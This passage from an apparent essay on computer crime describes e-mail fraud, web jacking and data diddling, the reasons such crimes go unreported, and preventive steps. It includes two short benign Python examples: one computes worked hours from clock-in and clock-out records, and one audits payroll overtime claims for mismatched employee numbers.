This type of crime may be prevented by carefully monitoring employees' check-in and check-out times and breaks. These activities may be difficult to manage manually, but time and attendance software not only reduces the time and effort considerably but also monitors employees more accurately. Such software may be integrated with different punch-clock hardware systems such as YubiKeys, swipe cards and biometric devices. It also helps other departments, such as payroll, attendance processing and accounting, by exporting work times into payroll software such as QuickBooks, Supply accounting, etc.
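The core calculation in time and attendance software is turning punch records into worked hours, with breaks being the gaps between punch pairs. The sketch below assumes a hypothetical record format of (clock-in, clock-out) timestamp strings; real products read these from the punch-clock hardware and apply company rules for rounding and overtime.

```python
from datetime import datetime


def worked_hours(punches: list[tuple[str, str]], fmt: str = "%Y-%m-%d %H:%M") -> float:
    """Sum worked time from (clock-in, clock-out) pairs; breaks are the gaps between pairs."""
    total_seconds = 0.0
    for clock_in, clock_out in punches:
        start = datetime.strptime(clock_in, fmt)
        end = datetime.strptime(clock_out, fmt)
        if end < start:
            raise ValueError(f"clock-out {clock_out} precedes clock-in {clock_in}")
        total_seconds += (end - start).total_seconds()
    return total_seconds / 3600


day = [("2016-01-04 09:00", "2016-01-04 12:30"),   # morning
       ("2016-01-04 13:15", "2016-01-04 17:45")]   # afternoon, after a 45-minute break
print(worked_hours(day))  # 8.0
```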

xxiii) E-mail fraud

In e-mail fraud, the victim falls for a scam and provides bank details in response to an e-mail containing an official-looking document about the transfer of a huge sum of money, for example from the Internal Revenue Service (IRS), a lottery or an inheritance.

xxiv) Web jacking

In web jacking, hackers gain access to and control of another user's web site and may also change the information on it. The motive behind this type of attack may be political or financial.

xxv) Data Diddling

Data diddling is the illegal or unauthorized alteration of data before or during their entry into a computer system, or before output. In other words, the information is changed from the way it should have been entered by the person typing in the data. The change may be made by a virus, or by a database or application programmer who has pre-programmed it. Anyone who creates, records, transports, encodes, examines, checks or otherwise has access to data that will enter a computer has an opportunity to change that information to his or her advantage before it enters processing.

Consider, for example, a person who filled out data forms for payroll purposes and noticed that overtime claims were entered into the computer by employee number rather than by name. This person then entered his or her own employee number against the claims of other employees who frequently worked overtime, and received extra income over a period of time.

This is one of the simplest methods of committing a computer-related crime, because it requires almost no computer skills. Despite the ease of committing the crime, the cost can be considerable. In another scenario, a person entering accounting data may alter records to show that his or her own account, or that of a friend or family member, has been paid in full. By changing the information or failing to enter it, the person is able to steal from the company. To deal with this type of crime, a company must implement policies and internal controls. These controls may include regular audits, software with built-in features to detect such problems, and supervision of employees.
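The payroll example suggests a simple internal control: reconcile each keyed record against its source document. The Python sketch below illustrates this idea under one stated assumption. It assumes the system captures the name written on the paper overtime form alongside the typed employee number, which is exactly the cross-check the system in the example lacked. The roster, the claim fields, and the function names are hypothetical. The check flags any claim whose employee number does not belong to the person named on the form. It also counts claims per employee number, so that an unusual concentration of claims can be reviewed manually.

```python
from collections import Counter

# Hypothetical master roster: employee number -> name on file.
ROSTER = {"1001": "A. Smith", "1002": "B. Jones", "1003": "C. Lee"}

# Hypothetical overtime claims as keyed in: the employee number typed by the
# clerk, plus the name written on the original paper form.
CLAIMS = [
    {"claim_id": 1, "emp_no": "1001", "form_name": "A. Smith", "hours": 4},
    {"claim_id": 2, "emp_no": "1003", "form_name": "B. Jones", "hours": 6},
    {"claim_id": 3, "emp_no": "1003", "form_name": "A. Smith", "hours": 5},
    {"claim_id": 4, "emp_no": "1003", "form_name": "C. Lee", "hours": 2},
]


def audit_claims(claims, roster):
    """Return IDs of claims whose keyed employee number does not match the name on the source form."""
    return [
        c["claim_id"]
        for c in claims
        if roster.get(c["emp_no"]) != c["form_name"]
    ]


def claims_per_employee(claims):
    """Count keyed claims per employee number; an unusual spike merits manual review."""
    return Counter(c["emp_no"] for c in claims)


if __name__ == "__main__":
    print("Mismatched claims:", audit_claims(CLAIMS, ROSTER))
    print("Claims per employee number:", claims_per_employee(CLAIMS))
```

With this sample data, claims 2 and 3 are flagged because they were keyed against number 1003 while the forms name other employees. Number 1003 also stands out with three claims. Such a check catches only the specific substitution described in the example. It supplements regular audits and supervision but does not replace them.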

VI. CONSEQUENCES OF CYBER ATTACKS AND CYBER CRIMES

The overall significance and consequences of computer crime may be difficult to assess, because the available statistics are unreliable: there is a particularly profound unwillingness to report computer-related crime. There may be many reasons for this reluctance, but the following four are widely accepted as explaining it:

• Fear of damage to the organization's reputation and of loss of public confidence;

• Lack of tools and infrastructure to establish that a crime has occurred;

• Concern about possible liability for failing to prevent the incident;

• The belief that public exposure of the incident would be tantamount to an admission of vulnerability, as well as instruction to others on how to commit the crime.

Cyber crimes committed using computers are fully prosecutable under existing substantive law (with perhaps some modification in procedural law, especially in the rules of evidence). Other abuses, such as "theft" of information or of computer time, should be left to civil law so as not to stifle innovation. One critic contends that actual computer-assisted crime is much less prevalent than popularly believed, although a certain mystique has unfortunately become attached to the whole area. Attaching criminal consequences to unauthorized use could have serious effects on the computer industry. In addition, it is argued that computer time and efficiency are so valuable that the existing lax industry standards of security should no longer be tolerated.

How can cyber crime arising from malicious attacks be prevented?

The following preventive measures should be taken to prevent cyber crime from occurring in our systems:

• Ensure that the operating system is up to date. This is especially essential when using the Windows operating system.